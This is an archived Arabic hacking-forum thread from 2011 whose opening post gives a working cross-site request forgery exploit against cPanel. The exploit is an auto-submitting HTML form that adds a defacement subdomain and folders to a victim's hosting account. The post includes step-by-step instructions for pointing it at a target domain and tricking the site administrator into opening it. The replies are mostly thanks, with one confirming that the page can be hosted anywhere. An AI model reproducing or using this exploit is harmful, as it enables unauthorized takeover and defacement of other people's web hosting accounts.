:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   حقن xss - ssi (http://www.vbspiders.com/vb/f427.html)
-   -   Cpanel [CSRF] Add Sub domain (http://www.vbspiders.com/vb/t41285.html)

KaLa$nikoV 01-06-2011 08:06 PM
Cpanel [CSRF] Add Sub domain
 
1 مرفق
كود PHP:
### Exploit Title: Cpanel [CSRF] Add Sub domain########
# Author: kalashnikov
# Software Link: http://www.cpanel.net/
###############/Exploit\###############################
<html>
<body onload="********.csrf.submit();">
<form name="csrf" method="POST" name="form0" action="http://vbspiders.com:2082/frontend/x3/subdomain/doadddomain.html">
<input type="hidden" name="domain" value="hacked-by-volcano" /> . <input type="hidden" name="rootdomain" value="vbspiders.com" />
<input type="hidden" name="dir" value="public_html/VoLc4n0" />
<input type="hidden" name="go" value="public_html/VoLc4n0/hacked" />
</html>
######################################################
Home :- VbSpIdErS.CoM VoLc4n0 FLa$h StOnE LoVe //\\ KaLa$nikoV t34m //\\
Greetz :- FK Mr.NoHa
###################################################### 

الثغره عاديه ومش خطيره

وتحتاج لهدنسه اجتماعيه كويسه :D

شرح ......
احفظ الثغره بامتداد html
غير اسم الدومين vbspiders.com الى الدومين الهدف
غير هذا الى ما تريد hacked-by-volcano
غير هذا الى ما تريد public_html/VoLc4n0
غير هذا الى ما تريد public_html/VoLc4n0/hacked

حسب الاعدادات اعلى سيتم انشاء هذا الدومين
hacked-by-volcano.vbspiders.com
وبداخله مجلد باسم
hacked

الاستغلال تقوم بحفظ الصفحه بامتداد html وارسالها الى اداري االموقع .....


بالتوفيق

SoLiTair4Ever 01-06-2011 08:10 PM
بارك الله فيك
جزاك الله الجنة

جيفارا المنصوري~ 01-07-2011 02:03 AM
بآرك الله فيك

آبدآآع يآبططلززز ! :D

Cyber Code 01-07-2011 02:13 AM
مبرووك , منها للأقوى إن شاء الله

ملاحظه بعتقد بتقدر ترفع الصفحه على اي موقع وترسلها للمدير نفس الطريقه لما تكون على جهازه ؟!

AminhoVic 01-07-2011 06:25 PM
بارك الله فيك

KaLa$nikoV 01-24-2011 03:35 AM
اقتباس:
المشاركة الأصلية كتبت بواسطة Cyber Code (المشاركة 280247)
مبرووك , منها للأقوى إن شاء الله

ملاحظه بعتقد بتقدر ترفع الصفحه على اي موقع وترسلها للمدير نفس الطريقه لما تكون على جهازه ؟!
يس حبيبي سايبر زي ما بتقول 100%
:yes:

sirache magma 02-09-2011 04:46 PM
بارك الله فيك

PRO-MAN 02-09-2011 04:57 PM
بارك الله فيك
جزاك الله الجنة

iTaChi 02-12-2011 11:45 PM
يعطيك العافيه يا وحش

بعد اذنك حبيبي راح انقل موضوعك من اجل الفائدة

وحقوقك محفوظة :)

oupsnight 02-14-2011 01:04 AM
جزاك الله خيرا

c--2 02-14-2011 02:18 AM
شئ رائع


الساعة الآن 10:35 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0